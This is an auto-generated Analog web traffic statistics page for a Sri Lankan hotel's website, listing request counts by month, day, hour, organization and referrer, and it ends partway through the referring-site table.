<?xml version="1.0" encoding="ISO-8859-1"?>
<?xml-stylesheet href="#internalStyle" type="text/css"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
	"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Web Server Statistics for firs.freudenbergleisure.com</title>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
<meta name="robots" content="noindex,nofollow" />
<meta name="generator" content="analog 6.0/Unix" />
<style type="text/css" id="internalStyle">
h2 {
	background-color: #A0C0F0;
	width: 98%;
	padding: 3px 6px;
}
table {
	text-align: right;
	margin-left: 30px;
	background-color: #D0E0F0;
	border-collapse: collapse;
}
th {
	border-bottom: 1px solid #404050;
	border-right: 1px dotted #606070;
	border-top: none;
	border-left: none;
	padding: 0px 5px 1px 5px;
	font-weight: bold;
	background-color: #A0C0F0;
}
td {
	padding: 0px 5px 1px 5px;
	border-right: 1px dotted #606070;
	border-left: none;
	border-bottom: none;
	border-top:none;
}
td.x {
	font-family: monospace;
	white-space: pre;
}
.xl {
	text-align: left;
	border-right: none;
}
.xr {
	text-align: right;
	border-right: none;
}
.bar {
	text-align: left;
	border-right: none;
}
tr.sub {background-color: #C0C0FF;
	font-style: italic;
}
.repdesc {
	font-style: italic;
}
.repspan {
	font-style: italic;
}
.goto {
	font-size: small;
}
.gensumtitle {
	font-weight: bold;
}
.gototitle {
	font-weight: bold;
}
.runtimetitle {
	font-weight: bold;
}
img {
	border-style: none;
}
a:link {
	color: blue;
	text-decoration: none;
}
a:visited {
	color: purple;
	text-decoration: none;
}
a:link:hover {
	text-decoration: underline;
}
a:visited:hover {
	text-decoration: underline;
}
a:link:active {
	color: red;
	text-decoration: underline;
}
a:visited:active {
	color: red;
	text-decoration: underline;
}
</style>
</head>
<body>
<div class="header"><h1><a name="Top" id="Top" href="http://www.analog.cx/"><img src="/images/analogo.png" alt="" /></a> Web Server Statistics for <a href="http://firs.freudenbergleisure.com/">firs.freudenbergleisure.com</a></h1>

<p class="analysisspan">Program started on Fri, May 31 2019 at  5:39 PM.
<br />Analyzed requests from Wed, Feb 28 2018 at 10:05 PM to Fri, May 31 2019 at  5:09 PM (456.79 days).</p>
</div>
<div class="gensum"><h2><a name="gensum" id="gensum">General Summary</a></h2>
<p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | General Summary | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#searchw">Search Word Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p>
<p class="lastseven">Figures in parentheses refer to the 7-day period ending May 31 2019 at  5:39 PM.</p>
<p class="gensumlines">
<span class="gensumtitle">Successful requests:</span> 88,673 (1,662)
<br /><span class="gensumtitle">Average successful requests per day:</span> 194 (237)
<br /><span class="gensumtitle">Successful requests for pages:</span> 27,719 (557)
<br /><span class="gensumtitle">Average successful requests for pages per day:</span> 60 (79)
<br /><span class="gensumtitle">Redirected requests:</span> 40,450 (230)
<br /><span class="gensumtitle">Distinct files requested:</span> 793 (3,909)
<br /><span class="gensumtitle">Distinct hosts served:</span> 11,227 (13,171)
<br /><span class="gensumtitle">Data transferred:</span> 2.63 gigabytes (67.53 megabytes)
<br /><span class="gensumtitle">Average data transferred per day:</span> 5.90 megabytes (9.65 megabytes)
</p>
</div><div class="month"><h2><a name="month" id="month">Monthly Report</a></h2>
<p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | Monthly Report | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#searchw">Search Word Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p>
<p class="eachunit">Each unit (<img src="/images/barb1.png" alt="+" />) represents 100 requests for pages or part thereof.</p>
<table>
<thead><tr><th class="x">month</th><th class="R">#reqs</th><th class="P">#pages</th><th class="bar">&nbsp;</th></tr></thead>
<tbody><tr><td class="x">Feb 2018</td><td class="R">3</td><td class="P">0</td><td class="bar"></td></tr>
<tr><td class="x">Mar 2018</td><td class="R">4804</td><td class="P">539</td><td class="bar"><img src="/images/barb4.png" alt="++++++" /><img src="/images/barb2.png" alt="" /></td></tr>
<tr><td class="x">Apr 2018</td><td class="R">7214</td><td class="P">670</td><td class="bar"><img src="/images/barb4.png" alt="+++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr>
<tr><td class="x">May 2018</td><td class="R">7847</td><td class="P">2194</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr>
<tr><td class="x">Jun 2018</td><td class="R">5687</td><td class="P">1769</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++" /><img src="/images/barb2.png" alt="" /></td></tr>
<tr><td class="x">Jul 2018</td><td class="R">5366</td><td class="P">1589</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++" /></td></tr>
<tr><td class="x">Aug 2018</td><td class="R">5335</td><td class="P">1760</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++" /><img src="/images/barb2.png" alt="" /></td></tr>
<tr><td class="x">Sep 2018</td><td class="R">4816</td><td class="P">1665</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++" /><img src="/images/barb1.png" alt="" /></td></tr>
<tr><td class="x">Oct 2018</td><td class="R">4947</td><td class="P">1447</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr>
<tr><td class="x">Nov 2018</td><td class="R">3662</td><td class="P">1265</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr>
<tr><td class="x">Dec 2018</td><td class="R">5286</td><td class="P">2014</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr>
<tr><td class="x">&nbsp;</td><td class="R">&nbsp;</td><td class="P">&nbsp;</td><td class="bar">&nbsp;</td></tr>
<tr><td class="x">Jan 2019</td><td class="R">8355</td><td class="P">3394</td><td class="bar"><img src="/images/barb32.png" alt="++++++++++++++++++++++++++++++++++" /><img src="/images/barb2.png" alt="" /></td></tr>
<tr><td class="x">Feb 2019</td><td class="R">6927</td><td class="P">3011</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr>
<tr><td class="x">Mar 2019</td><td class="R">6480</td><td class="P">2260</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr>
<tr><td class="x">Apr 2019</td><td class="R">5648</td><td class="P">1962</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /></td></tr>
<tr><td class="x">May 2019</td><td class="R">6296</td><td class="P">2180</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr>
</tbody></table>
<p class="busiesttime">Busiest month: Jan 2019 (3,394 requests for pages).</p>
</div><div class="daysum"><h2><a name="daysum" id="daysum">Daily Summary</a></h2>
<p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | Daily Summary | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#searchw">Search Word Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p>
<p class="eachunit">Each unit (<img src="/images/barb1.png" alt="+" />) represents 150 requests for pages or part thereof.</p>
<table>
<thead><tr><th class="x">day</th><th class="R">#reqs</th><th class="P">#pages</th><th class="bar">&nbsp;</th></tr></thead>
<tbody><tr><td class="x">Sun</td><td class="R">11004</td><td class="P">3271</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr>
<tr><td class="x">Mon</td><td class="R">11942</td><td class="P">3836</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr>
<tr><td class="x">Tue</td><td class="R">13348</td><td class="P">3917</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr>
<tr><td class="x">Wed</td><td class="R">14565</td><td class="P">4543</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr>
<tr><td class="x">Thu</td><td class="R">13532</td><td class="P">4259</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb4.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr>
<tr><td class="x">Fri</td><td class="R">13054</td><td class="P">4242</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb4.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr>
<tr><td class="x">Sat</td><td class="R">11228</td><td class="P">3651</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr>
</tbody></table>
</div><div class="hoursum"><h2><a name="hoursum" id="hoursum">Hourly Summary</a></h2>
<p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | Hourly Summary | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#searchw">Search Word Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p>
<p class="eachunit">Each unit (<img src="/images/barb1.png" alt="+" />) represents 40 requests for pages or part thereof.</p>
<table>
<thead><tr><th class="x">hour</th><th class="R">#reqs</th><th class="P">#pages</th><th class="bar">&nbsp;</th></tr></thead>
<tbody><tr><td class="x"> 0</td><td class="R">2597</td><td class="P">990</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr>
<tr><td class="x"> 1</td><td class="R">2900</td><td class="P">958</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /></td></tr>
<tr><td class="x"> 2</td><td class="R">2910</td><td class="P">954</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /></td></tr>
<tr><td class="x"> 3</td><td class="R">3167</td><td class="P">1004</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr>
<tr><td class="x"> 4</td><td class="R">2354</td><td class="P">914</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr>
<tr><td class="x"> 5</td><td class="R">2403</td><td class="P">910</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr>
<tr><td class="x"> 6</td><td class="R">2680</td><td class="P">981</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr>
<tr><td class="x"> 7</td><td class="R">3151</td><td class="P">1046</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr>
<tr><td class="x"> 8</td><td class="R">3588</td><td class="P">1085</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb4.png" alt="" /></td></tr>
<tr><td class="x"> 9</td><td class="R">3794</td><td class="P">1179</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr>
<tr><td class="x">10</td><td class="R">5560</td><td class="P">1469</td><td class="bar"><img src="/images/barb32.png" alt="+++++++++++++++++++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr>
<tr><td class="x">11</td><td class="R">4334</td><td class="P">1442</td><td class="bar"><img src="/images/barb32.png" alt="+++++++++++++++++++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr>
<tr><td class="x">12</td><td class="R">4962</td><td class="P">1569</td><td class="bar"><img src="/images/barb32.png" alt="++++++++++++++++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /></td></tr>
<tr><td class="x">13</td><td class="R">4674</td><td class="P">1325</td><td class="bar"><img src="/images/barb32.png" alt="++++++++++++++++++++++++++++++++++" /><img src="/images/barb2.png" alt="" /></td></tr>
<tr><td class="x">14</td><td class="R">4781</td><td class="P">1377</td><td class="bar"><img src="/images/barb32.png" alt="+++++++++++++++++++++++++++++++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr>
<tr><td class="x">15</td><td class="R">4690</td><td class="P">1384</td><td class="bar"><img src="/images/barb32.png" alt="+++++++++++++++++++++++++++++++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr>
<tr><td class="x">16</td><td class="R">4832</td><td class="P">1275</td><td class="bar"><img src="/images/barb32.png" alt="++++++++++++++++++++++++++++++++" /></td></tr>
<tr><td class="x">17</td><td class="R">3416</td><td class="P">1157</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb4.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr>
<tr><td class="x">18</td><td class="R">4152</td><td class="P">1183</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr>
<tr><td class="x">19</td><td class="R">3321</td><td class="P">1025</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr>
<tr><td class="x">20</td><td class="R">3760</td><td class="P">1149</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb4.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr>
<tr><td class="x">21</td><td class="R">3610</td><td class="P">1127</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb4.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr>
<tr><td class="x">22</td><td class="R">3668</td><td class="P">1101</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb4.png" alt="" /></td></tr>
<tr><td class="x">23</td><td class="R">3369</td><td class="P">1115</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb4.png" alt="" /></td></tr>
</tbody></table>
</div><div class="dom"><h2><a name="dom" id="dom">Domain Report</a></h2>
<p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | Domain Report | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#searchw">Search Word Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p>
<p><img src="./dom.png" alt="" /></p>
<p class="whatinc">
Listing domains, sorted by the amount of traffic.</p>
<table>
<thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">domain</th></tr></thead>
<tbody><tr><td class="R">85932</td><td class="b">96.08%</td><td class="xl">[unresolved numerical addresses]</td></tr>
<tr><td class="R">2741</td><td class="b"> 3.92%</td><td class="xl">[domain not given]</td></tr>
</tbody></table>
</div><div class="org"><h2><a name="org" id="org">Organization Report</a></h2>
<p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | Organization Report | <a href="#redirref">Redirected Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#searchw">Search Word Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p>
<p><img src="./org.png" alt="" /></p>
<p class="whatinc">
Listing the top 20 organizations by the number of requests, sorted by the number of requests.</p>
<table>
<thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">organization</th></tr></thead>
<tbody><tr><td class="R">15291</td><td class="b">17.94%</td><td class="xl">10</td></tr>
<tr><td class="R">14385</td><td class="b">15.23%</td><td class="xl">162.158</td></tr>
<tr><td class="R">11563</td><td class="b">11.79%</td><td class="xl">172.68</td></tr>
<tr><td class="R">7271</td><td class="b"> 9.27%</td><td class="xl">172.31</td></tr>
<tr><td class="R">5007</td><td class="b"> 5.64%</td><td class="xl">108</td></tr>
<tr><td class="R">3928</td><td class="b"> 3.68%</td><td class="xl">172.69</td></tr>
<tr><td class="R">2741</td><td class="b"> 3.92%</td><td class="xl">[domain not given]</td></tr>
<tr><td class="R">2730</td><td class="b"> 2.86%</td><td class="xl">141.101</td></tr>
<tr><td class="R">2681</td><td class="b"> 3.07%</td><td class="xl">66.249</td></tr>
<tr><td class="R">1283</td><td class="b"> 1.65%</td><td class="xl">112</td></tr>
<tr><td class="R">905</td><td class="b"> 0.97%</td><td class="xl">173.245</td></tr>
<tr><td class="R">854</td><td class="b"> 1.25%</td><td class="xl">40</td></tr>
<tr><td class="R">810</td><td class="b"> 0.91%</td><td class="xl">207.46</td></tr>
<tr><td class="R">804</td><td class="b"> 0.87%</td><td class="xl">18</td></tr>
<tr><td class="R">758</td><td class="b"> 0.83%</td><td class="xl">157.55</td></tr>
<tr><td class="R">698</td><td class="b"> 0.83%</td><td class="xl">138.197</td></tr>
<tr><td class="R">679</td><td class="b"> 0.79%</td><td class="xl">123</td></tr>
<tr><td class="R">543</td><td class="b"> 0.56%</td><td class="xl">46</td></tr>
<tr><td class="R">473</td><td class="b"> 0.55%</td><td class="xl">124</td></tr>
<tr><td class="R">451</td><td class="b"> 0.93%</td><td class="xl">37</td></tr>
<tr><td class="R">14818</td><td class="b">16.46%</td><td class="xl">[not listed: 557 organizations]</td></tr>
</tbody></table>
</div><div class="redirref"><h2><a name="redirref" id="redirref">Redirected Referrer Report</a></h2>
<p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | Redirected Referrer Report | <a href="#refsite">Referring Site Report</a> | <a href="#searchw">Search Word Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p>
<p><img src="./redirref.png" alt="" /></p>
<p class="whatinc">
Listing the top 30 referring URLs by the number of redirected requests, sorted by the number of redirected requests.</p>
<table>
<thead><tr><th class="R">#reqs</th><th class="xl">URL</th></tr></thead>
<tbody><tr><td class="R">1475</td><td class="xl"><a href="https://firs.freudenbergleisure.com/assets/css/firs_main.css">https://firs.freudenbergleisure.com/assets/css/firs_main.css</a></td></tr>
<tr><td class="R">1319</td><td class="xl"><a href="https://firs.freudenbergleisure.com/contact-us">https://firs.freudenbergleisure.com/contact-us</a></td></tr>
<tr><td class="R">765</td><td class="xl"><a href="http://www.firs.lk/">http://www.firs.lk/</a></td></tr>
<tr><td class="R">555</td><td class="xl"><a href="https://firs.freudenbergleisure.com/assets/360/lobby-home.html">https://firs.freudenbergleisure.com/assets/360/lobby-home.html</a></td></tr>
<tr><td class="R">359</td><td class="xl"><a href="https://firs.freudenbergleisure.com/accommodation">https://firs.freudenbergleisure.com/accommodation</a></td></tr>
<tr><td class="R">267</td><td class="xl"><a href="http://www.google.com.hk/">http://www.google.com.hk/</a></td></tr>
<tr><td class="R">199</td><td class="xl"><a href="https://firs.freudenbergleisure.com/location">https://firs.freudenbergleisure.com/location</a></td></tr>
<tr><td class="R">166</td><td class="xl"><a href="https://firs.freudenbergleisure.com/">https://firs.freudenbergleisure.com/</a></td></tr>
<tr><td class="R">159</td><td class="xl"><a href="https://sucuri.net/">https://sucuri.net/</a></td></tr>
<tr><td class="R">153</td><td class="xl"><a href="https://www.google.com/url/">https://www.google.com/url/</a></td></tr>
<tr class="sub level2"><td class="R">153</td><td class="xl">&nbsp;&nbsp;<a href="https://www.google.com/url/?sa=t">https://www.google.com/url/?sa=t</a></td></tr>
<tr><td class="R">119</td><td class="xl"><a href="https://firs.freudenbergleisure.com/assets/360/reinhart_room-home.html">https://firs.freudenbergleisure.com/assets/360/reinhart_room-home.html</a></td></tr>
<tr><td class="R">113</td><td class="xl"><a href="https://firs.freudenbergleisure.com/assets/360/molly_suite-home.html">https://firs.freudenbergleisure.com/assets/360/molly_suite-home.html</a></td></tr>
<tr><td class="R">107</td><td class="xl"><a href="https://firs.freudenbergleisure.com/assets/360/stephan_suite-home.html">https://firs.freudenbergleisure.com/assets/360/stephan_suite-home.html</a></td></tr>
<tr><td class="R">102</td><td class="xl"><a href="http://firs.lk/wp-login.php">http://firs.lk/wp-login.php</a></td></tr>
<tr><td class="R">99</td><td class="xl"><a href="http://www.thefirsnuwaraeliya.com/">http://www.thefirsnuwaraeliya.com/</a></td></tr>
<tr><td class="R">93</td><td class="xl"><a href="http://thefirsnuwaraeliya.com/wp-login.php">http://thefirsnuwaraeliya.com/wp-login.php</a></td></tr>
<tr><td class="R">75</td><td class="xl"><a href="http://firs.lk/">http://firs.lk/</a></td></tr>
<tr><td class="R">72</td><td class="xl"><a href="https://firs.freudenbergleisure.com/facilities">https://firs.freudenbergleisure.com/facilities</a></td></tr>
<tr><td class="R">55</td><td class="xl"><a href="https://firs.freudenbergleisure.com/privacy-policy">https://firs.freudenbergleisure.com/privacy-policy</a></td></tr>
<tr><td class="R">55</td><td class="xl"><a href="https://firs.freudenbergleisure.com/facilities/room-service">https://firs.freudenbergleisure.com/facilities/room-service</a></td></tr>
<tr><td class="R">52</td><td class="xl"><a href="https://firs.freudenbergleisure.com/terms-and-conditions">https://firs.freudenbergleisure.com/terms-and-conditions</a></td></tr>
<tr><td class="R">45</td><td class="xl"><a href="http://www.firs.lk/ppx.php">http://www.firs.lk/ppx.php</a></td></tr>
<tr><td class="R">34</td><td class="xl"><a href="http://thefirsnuwaraeliya.com/">http://thefirsnuwaraeliya.com/</a></td></tr>
<tr><td class="R">30</td><td class="xl"><a href="http://www.firs.lk/robots.txt">http://www.firs.lk/robots.txt</a></td></tr>
<tr><td class="R">29</td><td class="xl"><a href="https://firs.freudenbergleisure.com/assets/css/jquery-ui.css">https://firs.freudenbergleisure.com/assets/css/jquery-ui.css</a></td></tr>
<tr><td class="R">22</td><td class="xl"><a href="http://lankaemarketing.benchurl.com/c/l">http://lankaemarketing.benchurl.com/c/l</a></td></tr>
<tr class="sub level2"><td class="R">22</td><td class="xl">&nbsp;&nbsp;<a href="http://lankaemarketing.benchurl.com/c/l?u=7C7B462&amp;e=CB1AD7&amp;c=B87C1&amp;t=0&amp;l=7542F8BC&amp;email=Y5HKcyiHEpT5ClH5dioJYEyPBhzqZXIgBJcAT8xErqg%3D&amp;seq=2">http://lankaemarketing.benchurl.com/c/l?u=7C7B462&amp;e=CB1AD7&amp;c=B87C1&amp;t=0&amp;l=7542F8BC&amp;email=Y5HKcyiHEpT5ClH5dioJYEyPBhzqZXIgBJcAT8xErqg%3D&amp;seq=2</a></td></tr>
<tr><td class="R">18</td><td class="xl"><a href="http://firs.freudenbergleisure.com/wp-login.php">http://firs.freudenbergleisure.com/wp-login.php</a></td></tr>
<tr><td class="R">18</td><td class="xl"><a href="http://firs.freudenbergleisure.com/sites/all/libraries/elfinder/src/connectors/php/connector.php">http://firs.freudenbergleisure.com/sites/all/libraries/elfinder/src/connectors/php/connector.php</a></td></tr>
<tr><td class="R">18</td><td class="xl"><a href="http://thefirsnuwaraeliya.com/user/login">http://thefirsnuwaraeliya.com/user/login</a></td></tr>
<tr><td class="R">17</td><td class="xl"><a href="http://firs.lk/sites/all/libraries/elfinder/connectors/php/connector.php">http://firs.lk/sites/all/libraries/elfinder/connectors/php/connector.php</a></td></tr>
<tr><td class="R">1741</td><td class="xl">[not listed: 787 URLs]</td></tr>
</tbody></table>
</div><div class="refsite"><h2><a name="refsite" id="refsite">Referring Site Report</a></h2>
<p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | Referring Site Report | <a href="#searchw">Search Word Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p>
<p><img src="./refsite.png" alt="" /></p>
<p class="whatinc">
Listing the top 30 referring sites by the number of requests, sorted by the number of requests.</p>
<table>
<thead><tr><th class="R">#reqs</th><th class="xl">site</th></tr></thead>
<tbody><tr><td class="R">17694</td><td class="xl">https://firs.freudenbergleisure.com/</td></tr>
<tr><td class="R">17368</td><td class="xl">http://www.firs.lk/</td></tr>
<tr><td class="R">3021</td><td class="xl">http://firs.lk/</td></tr>
<tr><td class="R">1911</td><td class="xl">http://www.thefirsnuwaraeliya.com/</td></tr>
<tr><td class="R">1733</td><td class="xl">https://www.google.com/</td></tr>
<tr><td class="R">1436</td><td class="xl">http://thefirsnuwaraeliya.com/</td></tr>
<tr><td class="R">1341</td><td class="xl">https://www.google.lk/</td></tr>
<tr><td class="R">526</td><td class="xl">http://www.freudenbergleisure.com/</td></tr>
<tr><td class="R">511</td><td class="xl">https://sucuri.net/</td></tr>
<tr><td class="R">394</td><td class="xl">https://firs.freudenbergleisure.lk/</td></tr>
